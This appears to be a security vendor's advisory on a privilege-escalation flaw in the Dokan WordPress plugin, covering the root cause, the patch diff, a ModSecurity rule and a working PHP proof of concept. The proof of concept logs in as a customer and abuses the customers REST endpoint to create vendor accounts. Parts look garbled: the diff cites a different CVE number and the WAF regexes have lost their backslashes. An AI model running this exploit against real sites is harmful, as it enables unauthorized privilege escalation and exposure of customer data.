What is CVE-2026-49780?

CVE-2026-49780 is a privilege escalation vulnerability in the Dokan plugin for WordPress, affecting versions up to and including 5.0.2. It allows authenticated users with Customer-level access or higher to escalate their privileges to vendor-level by manipulating user roles through the Dokan REST API.

How does the vulnerability work?

The vulnerability exists due to insufficient permission checks in the Customers REST controller. Authenticated users can create or edit user accounts, including changing their roles to vendor, without proper authorization, allowing them to gain elevated access.

Who is affected by this vulnerability?

Any WordPress site using the Dokan plugin version 5.0.2 or earlier is vulnerable. This includes sites where users have Customer-level access or higher, potentially allowing those users to exploit the vulnerability.

How can I check if my site is affected?

To check if your site is affected, verify the version of the Dokan plugin installed. If it is version 5.0.2 or earlier, your site is vulnerable and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is patched in version 5.0.3 of the Dokan plugin. Updating to this version or later will mitigate the risk associated with CVE-2026-49780.

What does the CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity vulnerability. This means that successful exploitation could lead to significant security risks, including unauthorized access to sensitive data and the ability to manipulate user roles.

What practical risks does this vulnerability pose?

Successful exploitation allows an attacker to create or elevate user accounts to vendor status, granting access to sensitive features and data. This could lead to further compromises, including the installation of malicious plugins or modification of site settings.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can use the REST API to send crafted requests that exploit the vulnerability. It details the steps to log in as a customer and perform actions that escalate privileges, illustrating the ease of exploitation.

What are the recommended mitigation steps?

In addition to updating the Dokan plugin, administrators should regularly review user roles and permissions, implement strong authentication measures, and monitor for unusual activity on their sites.

Can this vulnerability affect other plugins or themes?

CVE-2026-49780 is specific to the Dokan plugin. However, similar vulnerabilities could exist in other plugins that do not properly enforce permission checks, so it is essential to maintain good security practices across all plugins.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Dokan plugin temporarily or restricting access to accounts with Customer-level permissions until the plugin can be updated.

Where can I find more information about this vulnerability?

Further details can be found in the official CVE database, security advisories from the plugin developers, and security blogs that cover WordPress vulnerabilities.

Published : June 21, 2026

CVE-2026-49780: Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy <= 5.0.2 Authenticated (Customer+) Privilege Escalation PoC, Patch Analysis & Rule

CVE ID CVE-2026-49780

Plugin dokan-lite

Severity High (CVSS 8.8)

CWE 266

Vulnerable Version 5.0.2

Patched Version 5.0.3

Disclosed June 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-49780:
This vulnerability allows authenticated attackers with Customer-level access or above to escalate their privileges to vendor-level by modifying other user accounts via the Dokan REST API. The flaw affects the Dokan plugin for WordPress versions up to and including 5.0.2. It has a CVSS score of 8.8, indicating high severity.

Root Cause:
The vulnerability resides in the permissions check of the Customers REST controller at `/dokan-lite/includes/REST/CustomersController.php`. The `check_permission()` method (line 58) originally only verified whether the current user was a vendor via `check_vendor_permission()`, but did not enforce object-level authorization. This meant any authenticated user with the “Customer” role could access endpoints for creating, editing, viewing, or deleting other users, including administrators. Additionally, the `prepare_object_for_database()` method (line 255) did not block the `role` or `roles` parameters, allowing attackers to change a target user’s role during creation or update operations. The `get_items()` method (line 90) also returned all customers without filtering by vendor relationship, exposing the entire user list.

Exploitation:
An attacker with a Customer-level account (or higher) can send a crafted REST API request to the `/wp-json/dokan/v1/customers` endpoint. For privilege escalation, the attacker could use the `create` action to register a new user with the `vendor` role, or use the `edit` action to modify an existing user (such as an administrator) and assign them the `vendor` role. The attacker would include the `role` parameter in the request body with value `seller` or `vendor`. For example, a POST request to `/wp-json/dokan/v1/customers` with JSON body `{“email”:”attacker@example.com”,”password”:”…”,”role”:”seller”}` creates a new vendor account. Alternatively, a PUT request to `/wp-json/dokan/v1/customers/{existing_user_id}` with `{“role”:”seller”}` elevates an existing user. The attacker could also enumerate all users via GET requests to the same endpoint.

Patch Analysis:
The patch applies multiple layers of defense. First, it adds object-level authorization in `is_target_user_allowed()` which checks if the target user exists, lacks admin capabilities, is not a vendor, and has an order relationship with the requesting vendor. Second, it modifies `check_vendor_permission()` to accept an object ID and context from WooCommerce’s permissions filter, validating the specific user being modified. Third, it blocks the `role` and `roles` parameters entirely in `prepare_object_for_database()`, returning a 403 error if either is present. Fourth, the `get_items()` method now filters returned users to only those with a purchasing relationship to the vendor. These changes ensure vendors can only manage customers who have ordered from them and cannot escalate privileges via role manipulation.

Impact:
Successful exploitation allows an attacker to create new vendor accounts or elevate existing accounts to vendor status. This grants them access to vendor-specific features, including managing products, viewing orders, accessing sensitive customer data, and potentially modifying other vendor settings. In the worst case, an attacker could compromise an administrator account and then reassign it as a vendor, though the patch also prevents targeting administrators by checking for protected capabilities. The privilege escalation could lead to full site compromise if the attacker leverages vendor access to install malicious plugins or modify critical site options.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/dokan-lite/assets/js/frontend.asset.php
+++ b/dokan-lite/assets/js/frontend.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('dokan-hooks', 'dokan-product-editor-utils', 'dokan-react-components', 'dokan-stores-core', 'dokan-stores-product-categories', 'dokan-stores-product-editor', 'dokan-stores-products', 'dokan-utilities', 'lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wc-components', 'wc-csv', 'wc-date', 'wp-api-fetch', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-plugins', 'wp-url'), 'version' => '069544a5dddbe916033d');
+<?php return array('dependencies' => array('dokan-hooks', 'dokan-product-editor-utils', 'dokan-react-components', 'dokan-stores-core', 'dokan-stores-product-categories', 'dokan-stores-product-editor', 'dokan-stores-products', 'dokan-utilities', 'lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wc-components', 'wc-csv', 'wc-date', 'wp-api-fetch', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-plugins', 'wp-url'), 'version' => 'c4fc6678d387e35f37f4');
--- a/dokan-lite/dokan-class.php
+++ b/dokan-lite/dokan-class.php
@@ -27,7 +27,7 @@
      *
      * @var string
      */
-    public $version = '5.0.2';
+    public $version = '5.0.3';

     /**
      * Instance of self
--- a/dokan-lite/dokan.php
+++ b/dokan-lite/dokan.php
@@ -3,7 +3,7 @@
  * Plugin Name: Dokan
  * Plugin URI: https://dokan.co/wordpress/
  * Description: An e-commerce marketplace plugin for WordPress. Powered by WooCommerce and weDevs.
- * Version: 5.0.2
+ * Version: 5.0.3
  * Author: Dokan Inc.
  * Author URI: https://dokan.co/wordpress/
  * Text Domain: dokan-lite
--- a/dokan-lite/includes/REST/CustomersController.php
+++ b/dokan-lite/includes/REST/CustomersController.php
@@ -58,27 +58,105 @@
      * @return WP_Error|boolean
      */
     protected function check_permission( $request, $action ) {
+        $messages = [
+            'view'   => __( 'Sorry, you cannot list resources.', 'dokan-lite' ),
+            'create' => __( 'Sorry, you are not allowed to create resources.', 'dokan-lite' ),
+            'edit'   => __( 'Sorry, you are not allowed to edit this resource.', 'dokan-lite' ),
+            'delete' => __( 'Sorry, you are not allowed to delete this resource.', 'dokan-lite' ),
+            'batch'  => __( 'Sorry, you are not allowed to batch update resources.', 'dokan-lite' ),
+            'search' => __( 'Sorry, you are not allowed to search customers.', 'dokan-lite' ),
+        ];
+
         if ( ! $this->check_vendor_permission() ) {
-            $messages = [
-                'view'   => __( 'Sorry, you cannot list resources.', 'dokan-lite' ),
-                'create' => __( 'Sorry, you are not allowed to create resources.', 'dokan-lite' ),
-                'edit'   => __( 'Sorry, you are not allowed to edit this resource.', 'dokan-lite' ),
-                'delete' => __( 'Sorry, you are not allowed to delete this resource.', 'dokan-lite' ),
-                'batch'  => __( 'Sorry, you are not allowed to batch update resources.', 'dokan-lite' ),
-                'search' => __( 'Sorry, you are not allowed to search customers.', 'dokan-lite' ),
-            ];
             return new WP_Error( "dokan_rest_cannot_$action", $messages[ $action ], [ 'status' => rest_authorization_required_code() ] );
         }
+
+        // CVE-2026-8761: object-level authorization for mutating actions.
+        $target_id = isset( $request['id'] ) ? (int) $request['id'] : 0;
+        if ( $target_id > 0 && in_array( $action, [ 'view', 'edit', 'delete' ], true ) ) {
+            $allowed = $this->is_target_user_allowed( $target_id );
+            if ( is_wp_error( $allowed ) ) {
+                $status = $allowed->get_error_data();
+                $status = isset( $status['status'] ) ? (int) $status['status'] : 403;
+                return new WP_Error( "dokan_rest_cannot_$action", $messages[ $action ], [ 'status' => $status ] );
+            }
+        }
+
+        return true;
+    }
+
+    /**
+     * Verify the requesting vendor may mutate the target user.
+     *
+     * Rejects targets that are missing, hold admin-grade capabilities,
+     * are themselves a vendor, or have never placed an order with the
+     * requesting vendor. CVE-2026-8761.
+     *
+     * @param int $target_id Target user id.
+     *
+     * @return true|WP_Error
+     */
+    protected function is_target_user_allowed( int $target_id ) {
+        if ( $target_id <= 0 || ! get_userdata( $target_id ) ) {
+            return new WP_Error( 'dokan_rest_invalid_target', __( 'Invalid user.', 'dokan-lite' ), [ 'status' => 404 ] );
+        }
+
+        $protected_caps = apply_filters(
+            'dokan_rest_protected_user_caps',
+            [
+                'manage_options',
+				'manage_woocommerce',
+                'edit_users',
+				'delete_users',
+				'list_users',
+				'promote_users',
+				'create_users',
+				'remove_users',
+			]
+        );
+        foreach ( $protected_caps as $cap ) {
+            if ( user_can( $target_id, $cap ) ) {
+                return new WP_Error( 'dokan_rest_forbidden_target', __( 'You cannot operate on this user.', 'dokan-lite' ), [ 'status' => 403 ] );
+            }
+        }
+
+        if ( dokan_is_user_seller( $target_id ) ) {
+            return new WP_Error( 'dokan_rest_forbidden_target', __( 'You cannot operate on this user.', 'dokan-lite' ), [ 'status' => 403 ] );
+        }
+
+        if ( ! dokan_customer_has_order_from_this_seller( $target_id, dokan_get_current_user_id() ) ) {
+            return new WP_Error( 'dokan_rest_forbidden_target', __( 'You cannot operate on this customer.', 'dokan-lite' ), [ 'status' => 403 ] );
+        }
+
         return true;
     }

     /**
      * Check if the current user has vendor permissions.
      *
+     * Doubles as a callback on the woocommerce_rest_check_permissions
+     * filter so WooCommerce's internal capability checks for mutating
+     * operations (create/edit/delete/batch) re-validate the target user.
+     * Read context is allowed through for the vendor.
+     *
+     * @param bool|mixed $permission  Original permission decision when used as a filter callback.
+     * @param string     $context     Operation context (read/edit/delete/create/batch).
+     * @param int        $object_id   Target object id.
+     * @param string     $object_type Object type (expected: user).
+     *
      * @return bool
      */
-    public function check_vendor_permission(): bool {
-        return dokan_is_user_seller( dokan_get_current_user_id() );
+    public function check_vendor_permission( $permission = false, $context = '', $object_id = 0, $object_type = '' ): bool {
+        if ( ! dokan_is_user_seller( dokan_get_current_user_id() ) ) {
+            return false;
+        }
+
+        $object_id = (int) $object_id;
+        if ( $object_id > 0 && ( '' === $object_type || 'user' === $object_type ) && in_array( $context, [ 'create', 'edit', 'delete', 'batch' ], true ) ) {
+            return ! is_wp_error( $this->is_target_user_allowed( $object_id ) );
+        }
+
+        return true;
     }

     /**
@@ -90,7 +168,24 @@
     public function get_items( $request ) {
         return $this->perform_vendor_action(
             function () use ( $request ) {
-                return parent::get_items( $request );
+                $response = parent::get_items( $request );
+                if ( is_wp_error( $response ) || ! ( $response instanceof WP_REST_Response ) ) {
+                    return $response;
+                }
+
+                $vendor_id = dokan_get_current_user_id();
+                $data = array_values(
+                    array_filter(
+                        (array) $response->get_data(),
+                        static function ( $item ) use ( $vendor_id ) {
+							$id = is_array( $item ) ? ( $item['id'] ?? 0 ) : 0;
+							return $id && dokan_customer_has_order_from_this_seller( $id, $vendor_id );
+                        }
+                    )
+                );
+
+                $response->set_data( $data );
+                return $response;
             }
         );
     }
@@ -255,6 +350,11 @@
      * @return WP_Error|WC_Data
      */
     protected function prepare_object_for_database( $request, $creating = false ) {
+        // CVE-2026-8761: never allow role/roles via this endpoint.
+        if ( null !== $request->get_param( 'role' ) || null !== $request->get_param( 'roles' ) ) {
+            return new WP_Error( 'dokan_rest_forbidden_field', __( 'You cannot modify the role of a user.', 'dokan-lite' ), [ 'status' => 403 ] );
+        }
+
         $customer = parent::prepare_object_for_database( $request, $creating );

         if ( is_wp_error( $customer ) ) {
@@ -278,10 +378,12 @@
      * @return mixed The result of the action.
      */
     private function perform_vendor_action( callable $action ) {
-        add_filter( 'woocommerce_rest_check_permissions', [ $this, 'check_vendor_permission' ] );
-        $result = $action();
-        remove_filter( 'woocommerce_rest_check_permissions', [ $this, 'check_vendor_permission' ] );
-        return $result;
+        add_filter( 'woocommerce_rest_check_permissions', [ $this, 'check_vendor_permission' ], 10, 4 );
+        try {
+            return $action();
+        } finally {
+            remove_filter( 'woocommerce_rest_check_permissions', [ $this, 'check_vendor_permission' ], 10 );
+        }
     }

     /**
--- a/dokan-lite/includes/REST/VendorDashboardController.php
+++ b/dokan-lite/includes/REST/VendorDashboardController.php
@@ -414,6 +414,7 @@
             'language'              => get_locale(),
             'week_start_on'         => get_option( 'start_of_week' ),
             'store_color'           => dokan_get_option( 'store_color_pallete', 'dokan_colors', [] ),
+            'enable_withdraw'       => dokan_get_option( 'hide_withdraw_option', 'dokan_withdraw', 'off' ) === 'off',
             'timezone_utc'          => $timezone_utc,
             'ai_settings'           => [
                 'ai_text_enable'    => $is_text_configured,
@@ -597,6 +598,12 @@
                     'context'     => [ 'view' ],
                     'readonly'    => true,
                 ],
+                'enable_withdraw' => [
+                    'description' => esc_html__( 'Enable withdraw option.', 'dokan-lite' ),
+                    'type'        => 'boolean',
+                    'context'     => [ 'view' ],
+                    'readonly'    => true,
+                ],
                 'ai_settings'    => [
                     'description' => esc_html__( 'Store AI Settings.', 'dokan-lite' ),
                     'type'        => 'object',
--- a/dokan-lite/includes/REST/WithdrawControllerV2.php
+++ b/dokan-lite/includes/REST/WithdrawControllerV2.php
@@ -100,6 +100,7 @@
         return rest_ensure_response(
             [
                 'withdraw_method' => $default_withdraw_method,
+                'is_manual_withdraw_enable' => ! empty( dokan_get_option( 'disbursement', 'dokan_withdraw' )['manual'] ?? false ),
                 'payment_methods' => array_values( $payment_methods ),
                 'active_methods'  => $active_methods,
                 'setup_url'       => $setup_url,
--- a/dokan-lite/templates/whats-new.php
+++ b/dokan-lite/templates/whats-new.php
@@ -4,6 +4,28 @@
  */
 $changelog = [
     [
+        'version'  => 'Version 5.0.3',
+        'released' => '2026-05-21',
+        'changes'  => [
+            'Improvement' => [
+                [
+                    'title'       => 'Exposed manual withdrawal availability and withdraw-visibility flags in the vendor dashboard REST API.',
+                    'description' => '',
+                ],
+            ],
+            'Fix' => [
+                [
+                    'title'       => 'Restricted the Customers REST endpoint to self-service to prevent vendors from modifying other user accounts.',
+                    'description' => '',
+                ],
+                [
+                    'title'       => 'Translated the "Actions" column header on vendor dashboard DataViews tables.',
+                    'description' => '',
+                ],
+            ],
+        ],
+    ],
+    [
         'version'  => 'Version 5.0.2',
         'released' => '2026-05-18',
         'changes'  => [
--- a/dokan-lite/vendor/composer/installed.php
+++ b/dokan-lite/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'wedevs/dokan',
-        'pretty_version' => 'v5.0.2',
-        'version' => '5.0.2.0',
-        'reference' => '730cd74b53bb863cae25c33910721506a5c388fb',
+        'pretty_version' => 'v5.0.3',
+        'version' => '5.0.3.0',
+        'reference' => 'd7fadd9a85f1b11e23841282782a45a367059c58',
         'type' => 'wordpress-plugin',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -38,9 +38,9 @@
             'dev_requirement' => false,
         ),
         'wedevs/dokan' => array(
-            'pretty_version' => 'v5.0.2',
-            'version' => '5.0.2.0',
-            'reference' => '730cd74b53bb863cae25c33910721506a5c388fb',
+            'pretty_version' => 'v5.0.3',
+            'version' => '5.0.3.0',
+            'reference' => 'd7fadd9a85f1b11e23841282782a45a367059c58',
             'type' => 'wordpress-plugin',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-49780
# Blocks privilege escalation via Dokan REST API by preventing role modification
SecRule REQUEST_URI "@rx ^/wp-json/dokan/vd+/customers" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-49780 - Dokan REST API privilege escalation blocked',severity:'CRITICAL',tag:'CVE-2026-49780'"
  SecRule ARGS_POST:role "@rx ^(seller|vendor|administrator|shop_manager)$" 
    "t:none,chain"
    SecRule ARGS_POST:roles "@rx ." 
      "t:none"

SecRule REQUEST_URI "@rx ^/wp-json/dokan/vd+/customers/d+" 
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-49780 - Dokan REST API user modification blocked',severity:'CRITICAL',tag:'CVE-2026-49780'"
  SecRule REQUEST_METHOD "@streq PUT" 
    "chain"
    SecRule ARGS_POST:role "@rx ." 
      "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-49780 - Dokan: AI Powered WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy <= 5.0.2 - Authenticated (Customer+) Privilege Escalation

// Configuration - update these variables
$target_url = 'http://example.com'; // Target WordPress site URL
$customer_username = 'attacker'; // Username of the attacker (Customer role)
$customer_password = 'password'; // Password of the attacker

// Step 1: Login as customer to obtain cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $customer_username,
    'pwd' => $customer_password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);
if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch));
}
echo "[+] Logged in as customern";

// Step 2: Get WordPress nonce for REST API
$nonce_url = $target_url . '/wp-admin/admin-ajax.php?action=rest-nonce';
curl_setopt($ch, CURLOPT_URL, $nonce_url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$nonce_response = curl_exec($ch);
$nonce = trim($nonce_response);
echo "[+] Got nonce: $noncen";

// Step 3: Attempt to create a new vendor account
$create_vendor_url = $target_url . '/wp-json/dokan/v1/customers';

$new_vendor_data = array(
    'email' => 'newvendor' . time() . '@example.com',
    'password' => 'vendorpassword123!',
    'role' => 'seller',
    'first_name' => 'New',
    'last_name' => 'Vendor'
);

$headers = array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $nonce
);

curl_setopt($ch, CURLOPT_URL, $create_vendor_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($new_vendor_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code == 201) {
    echo "[!] SUCCESS: Created new vendor accountn";
    echo "Response: $responsen";
    $response_data = json_decode($response, true);
    if (isset($response_data['id'])) {
        echo "[+] New user ID: " . $response_data['id'] . "n";
        echo "[+] New user email: " . $response_data['email'] . "n";
    }
} else {
    echo "[-] Failed to create vendor account. HTTP code: $http_coden";
    echo "Response: $responsen";
    // Try alternative: modify an existing customer
    echo "[+] Attempting to list customers...n";
    
    $list_url = $target_url . '/wp-json/dokan/v1/customers';
    curl_setopt($ch, CURLOPT_URL, $list_url);
    curl_setopt($ch, CURLOPT_HTTPGET, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    $list_response = curl_exec($ch);
    $list_http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    if ($list_http_code == 200) {
        echo "[+] Listed customers (potential info disclosure): $list_responsen";
    }
}

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-49780?
Overview of the vulnerability
CVE-2026-49780 is a privilege escalation vulnerability in the Dokan plugin for WordPress, affecting versions up to and including 5.0.2. It allows authenticated users with Customer-level access or higher to escalate their privileges to vendor-level by manipulating user roles through the Dokan REST API.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists due to insufficient permission checks in the Customers REST controller. Authenticated users can create or edit user accounts, including changing their roles to vendor, without proper authorization, allowing them to gain elevated access.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Dokan plugin version 5.0.2 or earlier is vulnerable. This includes sites where users have Customer-level access or higher, potentially allowing those users to exploit the vulnerability.
How can I check if my site is affected?
Verifying your WordPress installation
To check if your site is affected, verify the version of the Dokan plugin installed. If it is version 5.0.2 or earlier, your site is vulnerable and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 5.0.3 of the Dokan plugin. Updating to this version or later will mitigate the risk associated with CVE-2026-49780.
What does the CVSS score of 8.8 indicate?
Understanding severity levels
A CVSS score of 8.8 indicates a high severity vulnerability. This means that successful exploitation could lead to significant security risks, including unauthorized access to sensitive data and the ability to manipulate user roles.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
Successful exploitation allows an attacker to create or elevate user accounts to vendor status, granting access to sensitive features and data. This could lead to further compromises, including the installation of malicious plugins or modification of site settings.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept shows how an attacker can use the REST API to send crafted requests that exploit the vulnerability. It details the steps to log in as a customer and perform actions that escalate privileges, illustrating the ease of exploitation.
What are the recommended mitigation steps?
Best practices for WordPress administrators
In addition to updating the Dokan plugin, administrators should regularly review user roles and permissions, implement strong authentication measures, and monitor for unusual activity on their sites.
Can this vulnerability affect other plugins or themes?
Scope of the vulnerability
CVE-2026-49780 is specific to the Dokan plugin. However, similar vulnerabilities could exist in other plugins that do not properly enforce permission checks, so it is essential to maintain good security practices across all plugins.
What should I do if I cannot update the plugin immediately?
Interim measures
If an immediate update is not possible, consider disabling the Dokan plugin temporarily or restricting access to accounts with Customer-level permissions until the plugin can be updated.
Where can I find more information about this vulnerability?
Additional resources
Further details can be found in the official CVE database, security advisories from the plugin developers, and security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations